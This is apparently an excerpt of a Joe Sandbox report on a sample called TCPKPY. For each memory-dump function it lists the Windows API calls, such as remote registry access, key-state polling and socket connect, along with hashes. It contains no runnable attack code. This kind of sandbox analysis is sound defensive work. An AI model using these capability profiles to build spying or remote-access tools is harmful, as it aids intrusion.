                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327935632-0
                                                                                                                • Opcode ID: 3fc00f4ea4e82516e47dbeb4cf0dbc080d5d3e21e14216027d3b9c6b91fec630
                                                                                                                • Instruction ID: f0aa334b7e4094b3f3c478be1e366f6209405093cda6144871ffae425f420397
                                                                                                                • Opcode Fuzzy Hash: 3fc00f4ea4e82516e47dbeb4cf0dbc080d5d3e21e14216027d3b9c6b91fec630
                                                                                                                • Instruction Fuzzy Hash: 96515C75A20206DFCB00EFA8C4949AEB7B9BF58310B148055E955AB392DB30ED65DF90
                                                                                                                Function 00262D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00262DE0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00262E1F
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00262E66
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00262E92
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00262E9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440857362-0
                                                                                                                • Opcode ID: 04739082e02d481bcd0a57803b3b98c27ba51d97658f251189fbe9685d6eebbc
                                                                                                                • Instruction ID: 985f25b097d556b33484dbb3bc6ef0091d31efb4967350648f089b8b0c3805fe
                                                                                                                • Opcode Fuzzy Hash: 04739082e02d481bcd0a57803b3b98c27ba51d97658f251189fbe9685d6eebbc
                                                                                                                • Instruction Fuzzy Hash: 96513A71224305AFD704EF64C881E6BB7E8BF88304F14492EF5958B1A2DB71E969CF52
                                                                                                                Function 0026CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 50682001d2604290b20cfe1542125da3c31e495aaa76f92b7ceed606a757ae4d
                                                                                                                • Instruction ID: 1f8362f7f92a9e75277f847e90d29cf729131ea1fb8b4f3421329d11d5420237
                                                                                                                • Opcode Fuzzy Hash: 50682001d2604290b20cfe1542125da3c31e495aaa76f92b7ceed606a757ae4d
                                                                                                                • Instruction Fuzzy Hash: B6412639920105AFD724FF38DC49FB9BB68EB0A320F244256F899A72D1C7709DA0D790
                                                                                                                Function 00251726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002517D4
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002517FD
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0025183C
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00251861
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00251869
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1389676194-0
                                                                                                                • Opcode ID: 015f4e55f0320e41e4c11a5c1b1d4632b71988b963d10b05bcbf71e178bc43b8
                                                                                                                • Instruction ID: b8e3e1eccd84c05c0718e098fef665a4e9e5980d140e8df553b211a97a4e1ad1
                                                                                                                • Opcode Fuzzy Hash: 015f4e55f0320e41e4c11a5c1b1d4632b71988b963d10b05bcbf71e178bc43b8
                                                                                                                • Instruction Fuzzy Hash: F8413B35A10205DFDB15EF64C985EAEBBF5EF08310B148099E845AB3A2DB31ED25DF50
                                                                                                                Function 0021B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(000000FF), ref: 0021B749
                                                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 0021B766
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 0021B78B
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0021B799
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: cb3f84483d125478add71d01c486fd98949a8a3191e4d8f68df648ffdce24c14
                                                                                                                • Instruction ID: 727ebe63777b0f5e089f676dff0050ff6cf1c611f76d029c425ad5d854aba53a
                                                                                                                • Opcode Fuzzy Hash: cb3f84483d125478add71d01c486fd98949a8a3191e4d8f68df648ffdce24c14
                                                                                                                • Instruction Fuzzy Hash: 3E41603551411AFFDF169F64C844EE9BBB4BB59330F20835AF829962D0C731A9A0DFA0
                                                                                                                Function 0023C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0023C156
                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0023C200
                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0023C208
                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0023C216
                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0023C21E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: 3ad66734e97095c5174a0ccd7020eb833c478cd0777549fb058c4633275e1b33
                                                                                                                • Instruction ID: cb935fd2f4b3ed6935371d7340e5f7db09a5081fbf0e9d0bccb3407001ce25e4
                                                                                                                • Opcode Fuzzy Hash: 3ad66734e97095c5174a0ccd7020eb833c478cd0777549fb058c4633275e1b33
                                                                                                                • Instruction Fuzzy Hash: 8731B1B151021EEBDF14CFA8DD4DA9E3BB5EF04315F204225F969A71D1C7B09914DB90
                                                                                                                Function 0023E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 0023E9CD
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0023E9EA
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0023EA22
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0023EA48
                                                                                                                • _wcsstr.LIBCMT ref: 0023EA52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902887630-0
                                                                                                                • Opcode ID: 37a8038368f1302703a9836e67bdbde990c87076badce2abe8a63ad1cf4ffb2d
                                                                                                                • Instruction ID: 4257f2f169e3f2e8d0d95602ee47644552c5f81e6da605979f20ca5724ca0443
                                                                                                                • Opcode Fuzzy Hash: 37a8038368f1302703a9836e67bdbde990c87076badce2abe8a63ad1cf4ffb2d
                                                                                                                • Instruction Fuzzy Hash: 902149B2214214BBEF15AF69FC49E7B7BACDF45710F018029F809CA0D1EA60DC648750
                                                                                                                Function 0026DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026DCC0
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0026DCE4
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0026DCFC
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0026DD24
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0025407D,00000000), ref: 0026DD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2294984445-0
                                                                                                                • Opcode ID: 3e58661c159e01a6c15090f9d8c63d5e3e6f31f73eb87b318a941f6aea493f82
                                                                                                                • Instruction ID: 53f7aab23e11c83c575532f08f8d76871fa91639d362722fd0bcf7cb4076b023
                                                                                                                • Opcode Fuzzy Hash: 3e58661c159e01a6c15090f9d8c63d5e3e6f31f73eb87b318a941f6aea493f82
                                                                                                                • Instruction Fuzzy Hash: 9121D672B2421AAFCB206F789C48B6A37A4FB46374F110725F926C61E0D37098B0CB80
                                                                                                                Function 0023CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0023CA86
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0023CAB8
                                                                                                                • __itow.LIBCMT ref: 0023CAD0
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0023CAF6
                                                                                                                • __itow.LIBCMT ref: 0023CB07
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2983881199-0
                                                                                                                • Opcode ID: dd05f8043789e3676a5c6e20d6b347c9b6039c0d12e2e03643c2e8d4442c6aa9
                                                                                                                • Instruction ID: d0f5a0f196914f6ef6c07bd44563fbbd0ef7733e14de81108a721cab2219c3b2
                                                                                                                • Opcode Fuzzy Hash: dd05f8043789e3676a5c6e20d6b347c9b6039c0d12e2e03643c2e8d4442c6aa9
                                                                                                                • Instruction Fuzzy Hash: 2E21F9B67203187BDB10EE649C47EDE7BADAF49754F104024F905F7182E671CD2987A0
                                                                                                                Function 00246D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203B1E: _wcsncpy.LIBCMT ref: 00203B32
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00246DBA
                                                                                                                • GetLastError.KERNEL32 ref: 00246DC5
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00246DD9
                                                                                                                • _wcsrchr.LIBCMT ref: 00246DFB
                                                                                                                  • Part of subcall function 00246D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00246E31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3633006590-0
                                                                                                                • Opcode ID: b457a85cec1623d5f92e086fc7c4e2385473b0fd3294d5a1953751d7f2bf024b
                                                                                                                • Instruction ID: 4e4fe4c3c2553f5c50a7ce35a6f4a0f8fa7ebd1fbe77db2d1cefb407616778e8
                                                                                                                • Opcode Fuzzy Hash: b457a85cec1623d5f92e086fc7c4e2385473b0fd3294d5a1953751d7f2bf024b
                                                                                                                • Instruction Fuzzy Hash: D421D875B2131696DB286BB4EC4EEEA33DC8F06710F600555E425C70D2EB60CDA48E52
                                                                                                                Function 00259122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0025ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00259160
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0025916F
                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 0025918B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 3701255441-0
                                                                                                                • Opcode ID: 007f47365d6ca8b965e3ddfe2dc0977a6a347dd4b0a37714ffa8527a5019afa7
                                                                                                                • Instruction ID: df7373639143ef6eb92ae037959c1f0b105894d63ce8b394479e5b7124b75216
                                                                                                                • Opcode Fuzzy Hash: 007f47365d6ca8b965e3ddfe2dc0977a6a347dd4b0a37714ffa8527a5019afa7
                                                                                                                • Instruction Fuzzy Hash: A121C3352106119FDB00AF28DC89B6EB7A9EF44720F048019F9069B3D2CA70EC598B51
                                                                                                                Function 002589AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 002589CE
                                                                                                                • GetForegroundWindow.USER32 ref: 002589E5
                                                                                                                • GetDC.USER32(00000000), ref: 00258A21
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00258A2D
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00258A68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 879d68645e21984251c0f97e82405e06f2d7d1621727758233b4f66ef526077a
                                                                                                                • Instruction ID: b1d67ed167d72a5af949beadd3fbde71fdfb209104e0f518f663d0156ed26dc7
                                                                                                                • Opcode Fuzzy Hash: 879d68645e21984251c0f97e82405e06f2d7d1621727758233b4f66ef526077a
                                                                                                                • Instruction Fuzzy Hash: E721C679A10204EFDB04EF65DC89AAA7BF9EF44301F048478E84997392DB70AC04CB50
                                                                                                                Function 0021B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0021B5EB
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0021B5FA
                                                                                                                • BeginPath.GDI32(?), ref: 0021B611
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0021B63B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: 75495552a386a4e8ace11f960334c074b323e0b59bbebe0927eb8da6cb9c31da
                                                                                                                • Instruction ID: f872a23aab156b59bf57bd663857689ab55b012c8a10954a4a31e338b7371e71
                                                                                                                • Opcode Fuzzy Hash: 75495552a386a4e8ace11f960334c074b323e0b59bbebe0927eb8da6cb9c31da
                                                                                                                • Instruction Fuzzy Hash: 5A21AC70825346EBEB12AF15FD4EBE97BF9FB22325F504216E814920E2C37088F58B50
                                                                                                                Function 00222E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __calloc_crt.LIBCMT ref: 00222E81
                                                                                                                • CreateThread.KERNEL32(?,?,00222FB7,00000000,?,?), ref: 00222EC5
                                                                                                                • GetLastError.KERNEL32 ref: 00222ECF
                                                                                                                • _free.LIBCMT ref: 00222ED8
                                                                                                                • __dosmaperr.LIBCMT ref: 00222EE3
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2664167353-0
                                                                                                                • Opcode ID: a57303089113ce77e4892c2cc2ac5b737c93b641709a21886be4f616f647c669
                                                                                                                • Instruction ID: c3546df389b1b5a8b3283dd0f33e6ca092dda180816c1806e0a5e4724652d784
                                                                                                                • Opcode Fuzzy Hash: a57303089113ce77e4892c2cc2ac5b737c93b641709a21886be4f616f647c669
                                                                                                                • Instruction Fuzzy Hash: F5110836125326FFD720AFE5BC42DAB7BE8EF04770B110029F91486191EB32E8249B61
                                                                                                                Function 0023B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0023B903
                                                                                                                • GetLastError.KERNEL32(?,0023B3CB,?,?,?), ref: 0023B90D
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,0023B3CB,?,?,?), ref: 0023B91C
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0023B3CB,?,?,?), ref: 0023B923
                                                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0023B93A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
